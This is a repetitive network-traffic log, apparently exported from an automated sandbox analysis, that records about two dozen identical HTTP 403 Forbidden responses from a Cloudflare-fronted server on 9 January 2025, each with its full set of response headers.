Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVqncW13PoBrPLqEUCNR4w%2FRdrr4WDAJB88IUisrT%2BfZNmNojCIDCzMeFrgvU80iEOCHmXNraPGRDCvhQzfc66mGjcgptoK84qdDFbR9GosHef6M8LArLcCfmy3HgVQKrT4yMydeUEaoTS4v"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2ae2a0b4244-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1714&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1655328&cwnd=221&unsent_bytes=0&cid=13eea5df2ee57d96&ts=129&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drxyGZyIlH1gnzbSmcIlgBWdYX2i27zLdd2ez9p5CfYjm%2F9TlAHSQ0YL0S4rhlxM%2Fa8HddBa5yHTO%2B7PVeqFt0QhyROWzwWcx9G7ez0hzX9TyItChw08z2zBta9buY3yhWJPjnZ0DPajR5PZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2b2192b4314-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1569&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1775075&cwnd=188&unsent_bytes=0&cid=4f52aa617e906353&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7CX3xgR9OV49TtChwKiLp30r440tKmtzf9PORXsiR5rPlt290HPXkaMzOM9L7kFgjhpOPgcg9utF43ekkeUCdqude1ksFuYr6e1RVIocLx53zTw0Tg31ShigWeH%2BvgT4mqf4fbP7ZsOBFxG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2b5cfe9de92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1663&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1720683&cwnd=239&unsent_bytes=0&cid=9a3af75fb8a3e9fe&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jb82k7oqzAaoGRQHh9o%2FATWV0vTAO8aeE%2FmTQmXALcJQ1IhX9uF7j8wBWiCFa8FZ%2F14HBZ%2F77OM4RSkbI1S5B0unq6yKLssnPiHj6St%2BjNaYiZdfNDaCl9WOsJSzyNQGRS5oVDnvCp%2FDfuKJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2b96bce18bc-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1630&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1737061&cwnd=250&unsent_bytes=0&cid=12ddeeebbe9ea28c&ts=125&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F3fZ%2FbwzjFHf%2BkMeTsEFhWONW0w9FOQ616jYF%2B96dJS5CBvYTGUByjGVeLDSJlkpyOjKGtr8PKR2OecHwOtmSRFkMlVZzs0sDgx7cRaXUdD80bwC%2BsHBWjID0aekZ%2BZJ1P2J5BL0VCLWpkRL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2bd3cf743b8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1656&rtt_var=640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1763285&cwnd=231&unsent_bytes=0&cid=628ea6da6ee3b162&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:28 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oh5GQsr8Xw12ZrNSWKIT5wAXNFL6cQj%2F9zf9Ncqfn%2ByA6i3U%2BY8TkYUzo3OTs4yTlp3psa6zzpDMcODDgc%2Buf9KVgZ5n5NjYTU1gLtqn7Hm8Wa88KERWOJJ5MgJJ7J%2F2FHu%2FTtwcg2RcIbNN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2c0e9fe7c93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1921&min_rtt=1918&rtt_var=726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1499743&cwnd=210&unsent_bytes=0&cid=75608cbe750a601b&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:28 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m69qh7m79PPJhMbk%2FvZEoudUOkSANzruOzhO811NN3%2BQxazqj5iEHkk1kVgCLuh82DWDauCj4xCB7C8OxaAY%2B94jisNXge%2BG%2FNOQ9Pi2e75PDf5rSYTUlTK4LKgRFvXYpI%2FwrG5aMyzCKD%2Fa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2c4bbb23314-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1978&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1432777&cwnd=212&unsent_bytes=0&cid=bcf7a3889a70a72e&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:29 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGUSCDymIkXvX45biu39eCWens4QvUdboZsprdHgYqHSES1Indg%2F0JankdAVMEhj06zxFAEw%2B319Yr1M0X%2BZfrV2%2FmLIVkdAnAqv%2FJOMtDjyG1giqkFUKXFeI2C4bmQHKcV4KHtEsB62Yflr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2c87fa1447a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1557&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1792510&cwnd=232&unsent_bytes=0&cid=7f0c65799833f17d&ts=124&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:29 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ydCKu9RBcnfetCr7VaQG9gW%2FsyQe4Ic3bCD3gJPvRb2XUrGOCMq41Mm%2F3SlzckoVwpr2h0kdqTzJk4B2Quf89rrBe72y8RsIqrkRDJdaTIFwwhjIEy8yPUmFbQUtn7dDC%2FFk0vwUgRn5wSj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2cc4cc45e7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=2204&rtt_var=846&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1279579&cwnd=196&unsent_bytes=0&cid=e2486fc115397ed0&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:30 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1Jm1Jzups1LeEK9QSNkxHPrlqArTVqxJJ6gMiJbOv3h3XQgGScebi4QblSckFWsFBSSULJqEsXlI8NAZMBjUmV7MzGnijNRtlp1UyKTn7lsNTfBNdP9O0BRIwiKGifDr7XE12i2L08aqfMH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2d00f7343bd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1597&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1793611&cwnd=190&unsent_bytes=0&cid=b06ec608665ab5a5&ts=154&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=877wZfM%2B0lQzhGp35ijRKyY0K%2BTnOqQUN1L07Fu3hSrDZfvl0ElbDIsgaRTO4%2BTb4ZWtAqd0u0bQlA0ZDd8AHonGUrk%2FAgh35%2BM2dH0I9Le2RDl2%2BveGAhdCD4MpjdQLMC4y2lP%2BQGSt1oq2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2d3d9ce8c17-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1949&rtt_var=753&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1433480&cwnd=231&unsent_bytes=0&cid=b1ce408ddcceed83&ts=146&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9Y%2BHBnbuqey1K7RvDTUjsDBHKOsRoZodvX8MIM0rfQBcP8oKEgN5ZaG3DYaU7RyQ1Im8AA%2BX%2BJ3ej51WkseFiDt2u8VHrY%2FD5rG5wkQOJcMtdmvt8SaTHIBaICu8ys%2FmHe4ta6cDZ9YfFE8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2d79edf4255-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2162&min_rtt=2149&rtt_var=833&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1293179&cwnd=225&unsent_bytes=0&cid=c1ac1566299157b1&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZQyUa4%2FzCt8W3Q3aPDunwYNtvwLLHsJ8M8MGJOypxG92SVesnWLHmU0yi4HKAY5kVCn41CKlDCIaR3VMvZIac55Zo65gwAYf7Fdliafs9S86cPB4CiE56MmVQYci1f8hFLjZ3xk84c9NS6F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2db6ef4c34b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1450&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1923583&cwnd=172&unsent_bytes=0&cid=799c699e9f31c6d1&ts=142&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQi7EFgrF291LmGg45iqMi2ScsgQVqLacNdihGvi5fUeL8YSPdiOcIU7DXdSAX%2BeT229FzALOpBXbX%2Bh24DmKXYVgE%2FffD2GxM%2B6mkShKinamM5psd59mfRleEhonkU3VCQL44LmA%2BZKissZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2df499b8c6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1991&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1457813&cwnd=168&unsent_bytes=0&cid=75fa9eb6dc9f2386&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:33 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DluGHgQQ0cpVVikz33QUQvxQXE6m6OKNYdm9EbMOUWiQm%2FtuBAc5sjRdPdyKiZFHI8sspddrHoV4q%2FCdYJwDq55NmfQtwHPRZKb7OdaJrXgx44%2F53Gh0juHmMocxs1uL%2FUzyzGWtdEscvtmY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2e30afb43a0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1575&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1782661&cwnd=219&unsent_bytes=0&cid=02188a39a65eb947&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWvXPRUiMaJSlXauqEr7naVz%2FkdMKyeuiUZTfyI0OCE3vBuL%2FK4Y%2B7XQ5%2BHeQmhf6TfZH4g3e%2BGzPiUYjAh50NFqf17tQhY1b0Jp8Xlo%2Fr%2B2amQyPQPZLMS0UlVNvS6lL0CdSb1YmWF2zdH%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2e83d350c9c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1498&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1907250&cwnd=241&unsent_bytes=0&cid=aba3629948b415dd&ts=154&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:35 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SG7aXG6x5JnKBFRIKKpmHH5D%2B4ALJn5yz7I3TAjR3j%2Fg3uHWpyYd06vyQqVL93zfgmlfctvhndksjTT2108NXJUQF3vhS27LAr%2BPq0enBmv2eciT9ddSQiPO4vLsSQQRkFr1wggwHTd34Vtv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2ec1921428f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1922&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1519250&cwnd=100&unsent_bytes=0&cid=a4852dec57675f58&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:35 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idt6Z2Rcvk4hDLxwgFFCIUDzzTOd%2BEfKT9ql1BukHPg%2BzHWH%2BcFRaEIB3XKaZQp3RMr%2FsmhMyF5i7M%2BwHQNmZdUXr%2BcbNvN3GtRpzBvcNTIgOWWpUbLJZECpyEKopI6Dp%2Br%2FJClWxDNGDtss"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2efeba242cd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1708&rtt_var=657&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1644144&cwnd=242&unsent_bytes=0&cid=948e7e1ca8ff5bdc&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5s4TGpVA9BZeqooItWhFckfBlbtVlnnkDYFYDCx20r24SQ6PBwuidghvJUUA7%2Fy0R7K7wiqFLFfULafk5LWxhHero4N%2B6ziut8fL7NXmXtkodSB6wuC4%2BUIHC6xoAZmYY8W%2BoMlZs8hiDoH8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2f3c9c54376-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1602&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1822721&cwnd=248&unsent_bytes=0&cid=5a3b15ba401c6e43&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSlrzHUUIL38EAnyVlu1X3I5kCO1klFteot5w2jse7mhzgnA2BWbALO7q9uApKlMqRlRqSLtvZ9gf3f2a9ASd2A4doQzSk8AKI0QNz9s9C714PpCHonUJHqsPk1PStpX2MHuQ%2FwhxYe0Il07"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2f7880cc3f3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1552&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1702623&cwnd=190&unsent_bytes=0&cid=662248fe3bb7a862&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9GcMlalLnOTpwfqnWEYfXAidPDv8cKSERmBO2x6Dhc%2BhNYSzLDCSL3oUzrWSb0ndvOOE4Jt0zyPJ7Gf9cBvFsGJX%2Bat5fVvwwaMtfjpqthwea0JcM4TdFFMf9TSgGGD7G7hJQ9xxkTSQj8t"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2fb9f787c99-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1988&rtt_var=750&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1454907&cwnd=235&unsent_bytes=0&cid=c60d10f8b6f8c708&ts=170&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:38 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWSFkyyPkR%2Fvmarjb7MSWibMDQEttBxmxpju8IM6h%2F8xnozFYyK8zOloxUnoS7PXKAPpPLWbXmvVtqKu4QL9bp3IFmkGEiWbbtiIImxhjHfVfBvx4g4aBiA%2BK8Q04dw%2F8LQaGzB5Nt%2BsmGLF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c2ffb9495e6e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1557&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1793611&cwnd=235&unsent_bytes=0&cid=8014d7f0a42d873e&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:38 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0kq1ggO9gu5kBEnGxRBz5qB6pjhwKnfrlf9wfXXAIybAnh7GnPRMq%2BWtKKVHG7HvY3N0LFIPgBfzpkxQPf%2FqBtLDgAZAWYE%2FbGCPw%2BgziQ8DBPmmSTr6hUbi6aK19JtfLG8uF4t0yIuE0vY2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3039bae5e64-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1558&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1795817&cwnd=246&unsent_bytes=0&cid=4fe4dacd80ac17a1&ts=145&x=0"
